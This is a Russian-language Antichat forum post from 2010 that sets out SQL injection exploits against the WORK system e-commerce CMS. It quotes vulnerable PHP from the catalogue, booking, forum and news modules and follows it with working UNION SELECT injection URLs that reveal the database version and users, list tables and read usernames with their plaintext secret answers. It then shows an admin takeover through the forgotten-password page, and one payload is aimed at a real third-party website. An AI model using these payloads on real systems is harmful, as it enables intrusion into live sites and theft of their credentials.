Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
05.03.2010, 22:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
WORK system CMS e-commerce
http://sourceforge.net/projects/worksystem/
module/catalogue/view_catalogue.php
PHP код:
$select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";
...
#read data of product supplier : addresses
$error_select = "";
$total_select = 0;
$query_selecta = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,b.POSTCODE as POSTCODEA,b.ADDRESS as ADDRESSA,b.TOWN as TOWNA,b.COUNTRY as COUNTRYA,b.USERNAME as USERNAMEA,b.EMAIL as EMAILA,b.PHONE as PHONEA,b.WEB_SITE as WEBSITEA
FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."USER b
where ID_CATALOGUE=".$select_catalogue." and a.CREATOR=b.USERID ";
...
$query_select = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,c.POSTCODE,c.ADDRESS,c.TOWN,c.COUNTRY,c.EMAIL,c.COMPANY_NAME,c.PHONE
FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."SHOPPING_DELIVERY c
where ID_CATALOGUE=".$select_catalogue." and c.USERID=a.CREATOR";
...
$query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,
UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY,
COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE
FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+unio n+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,2,3,4,5,6,user(),8,9+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++uni on+select+1,version(),3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
-----------------------
module/booking/view_room.php
PHP код:
$select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";
...
$query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,RESUME,
UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY,
COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE
FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
http://localhost/worksystem_4_0_39/module/booking/view_room.php?amp;work_url=0168e286bf&select_catal ogue=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,version()+limit+1,1
-----------------------
module\forum\detailforum.php
PHP код:
include($g_include_forum."include_display_detailforum.php");
include_config.php
PHP код:
global_register('GET','POST');
function global_register() {
$num_args = func_num_args();
if ($num_args > 0) {
for ($i = 0; $i < $num_args; $i++) {
$method = strtoupper(func_get_arg($i));
if (($method != 'SESSION') && ($method != 'GET') && ($method != 'POST') && ($method != 'SERVER') && ($method != 'COOKIE') && ($method != 'ENV')) {
die("The \"$method\" is invalid argument, The argument of global_register must be the following: GET, POST, SESSION, SERVER, COOKIE, or ENV"); }
$varname = "_{$method}";
global ${$varname};
foreach (${$varname} as $key => $val) {
global ${$key};
${$key} = $val;
}
}
}else{
die('You must specify at least one argument');
}
}
module\forum\include\include_display_detailforum.p hp
PHP код:
$query_select = "SELECT ID,ID_INIT,TITLE,STATE,DESCRIPTION,CREATOR,UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION,LINK
FROM ".$g_db_prefix."FORUM_INIT where ID=$select_forum and STATE=$state_display $profile_forum order by ORDER_DISPLAY asc, DATE_CREATION asc";
SQL
http://localhost/worksystem_4_0_39/module/forum/detailforum.php?select_forum=3+union+select+1,2,us er(),4,version(),6,7,8+--+&work_url=2fa5af6c22#
------------------------
module\news\view_news.php
PHP код:
$select_news = ( isset($_REQUEST['select_news']) and intval($_REQUEST['select_news']) >= 1 ) ? $_REQUEST['select_news'] : "";
...
$query_select = "SELECT a.ID,a.TITLE,a.STATE,a.LINK,a.DESCRIPTION,b.CREATOR,a.FILE_NAME,
UNIX_TIMESTAMP(a.DATE_CREATION) as DATE_CREATION,a.WHERE_IMAGE,a.SIZE_IMAGE,a.HITS,a.WRAPPER
FROM ".$g_db_prefix."NEWS a, ".$g_db_prefix."NEWS_SUPPLIER b where ID=$select_news and a.ID=b.NEWS_ID ";
SQL
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,user() ,3,database(),version(),6,7,8,9,10,11,12+--+
------------------------------
Заходим админом
Кроме стандартного захода login : password, предусмотрен login : Secret answer, причем Secret answer хранится в таблице user
открытым текстом.
Узнаем префикс таблиц в базе.
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,TABLE_ NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+inform ation_schema.tables+--+
http://www.artpeinture.fr/work/module/news/view_news.php?select_news=12+union+select+1,TABLE_ NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+inform ation_schema.tables+--+&work_url=8cd560377a
Читаем username и Secret answer
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,name,3 ,ANSWER,5,6,7,8,9,10,11,12+from+work_user+--+
Запасной вход
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=admin&work_url= 8cd560377a
или
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=blabla'+or+GROUP_ID =7+--+&work_url=8cd560377a
вводим секретный ответ и мы админы.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид